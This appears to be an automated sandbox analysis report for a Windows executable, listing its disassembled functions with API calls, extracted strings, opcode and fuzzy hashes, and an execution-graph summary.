                                                                                                                  • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                  • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                  Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                  • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                  • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                  Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                                                  • String ID: URL
                                                                                                                  • API String ID: 2108176848-3574463123
                                                                                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                  Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                  • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                  • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                  Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf
                                                                                                                  • String ID: %%-%d.%ds
                                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                                  • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                  • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                  Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                  • memset.MSVCRT ref: 00401917
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                  • String ID: WinPos
                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                  • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                  • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                  Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                  • String ID: _lng.ini
                                                                                                                  • API String ID: 383090722-1948609170
                                                                                                                  • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                  • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                  Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                  • API String ID: 2773794195-880857682
                                                                                                                  • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                  • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                  Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                  • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow
                                                                                                                  • String ID: MZ@
                                                                                                                  • API String ID: 1378638983-2978689999
                                                                                                                  • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                  • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                  • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                  • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                  Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                  • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                  • memset.MSVCRT ref: 0042BAAE
                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 438689982-0
                                                                                                                  • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                  • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                  Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1860491036-0
                                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                  Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                  • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                  Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                  • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                  Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                  • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                  • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                  • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 231171946-0
                                                                                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                  Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3669619086-0
                                                                                                                  • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                  • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                  Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                  • free.MSVCRT ref: 00417425
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2605342592-0
                                                                                                                  • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                  • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                  Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcslen$wcscat$wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1961120804-0
                                                                                                                  • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                  • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:2.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                  Signature Coverage:0.5%
                                                                                                                  Total number of Nodes:870
                                                                                                                  Total number of Limit Nodes:22
                                                                                                                  execution_graph 34103 40fc40 70 API calls 34276 403640 21 API calls 34104 427fa4 42 API calls 34277 412e43 _endthreadex 34278 425115 76 API calls 34279 43fe40 133 API calls 34107 425115 83 API calls 34108 401445 memcpy memcpy DialogBoxParamA 34109 440c40 34 API calls 34111 411853 RtlInitializeCriticalSection memset 34112 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34285 40a256 13 API calls 34287 432e5b 17 API calls 34289 43fa5a 20 API calls 34114 401060 41 API calls 34292 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34294 405e69 14 API calls 34119 433068 15 API calls 34296 414a6d 18 API calls 34297 43fe6f 134 API calls 34121 424c6d 15 API calls 34298 426741 19 API calls 34123 440c70 17 API calls 34124 443c71 44 API calls 34127 427c79 24 API calls 34301 416e7e memset 34131 42800b 47 API calls 34132 425115 85 API calls 34304 41960c 61 API calls 34133 43f40c 122 API calls 34136 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34137 43f81a 20 API calls 34139 414c20 memset memset 34140 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34308 414625 18 API calls 34309 404225 modf 34310 403a26 strlen WriteFile 34312 40422a 12 API calls 34316 427632 memset memset memcpy 34317 40ca30 59 API calls 34318 404235 26 API calls 34141 42ec34 61 API calls 34142 425115 76 API calls 34319 425115 77 API calls 34321 44223a 38 API calls 34148 43183c 112 API calls 34322 44b2c5 _onexit __dllonexit 34327 42a6d2 memcpy 34150 405cda 65 API calls 34335 43fedc 138 API calls 34336 4116e1 16 API calls 34153 4244e6 19 API calls 34155 42e8e8 127 API calls 34156 4118ee RtlLeaveCriticalSection 34341 43f6ec 22 API calls 34158 425115 119 API calls 33158 410cf3 EnumResourceNamesA 34344 4492f0 memcpy memcpy 34346 43fafa 18 API calls 34348 4342f9 15 API calls 34159 4144fd 19 API calls 34350 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34351 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34354 443a84 _mbscpy 34356 43f681 17 API calls 34162 404487 22 API calls 34358 415e8c 16 API calls 34166 411893 RtlDeleteCriticalSection 34167 41a492 42 API calls 34362 403e96 34 API calls 34363 410e98 memset SHGetPathFromIDList SendMessageA 34169 426741 109 API calls 34170 4344a2 18 API calls 34171 4094a2 10 API calls 34366 4116a6 15 API calls 34367 43f6a4 17 API calls 34368 440aa3 20 API calls 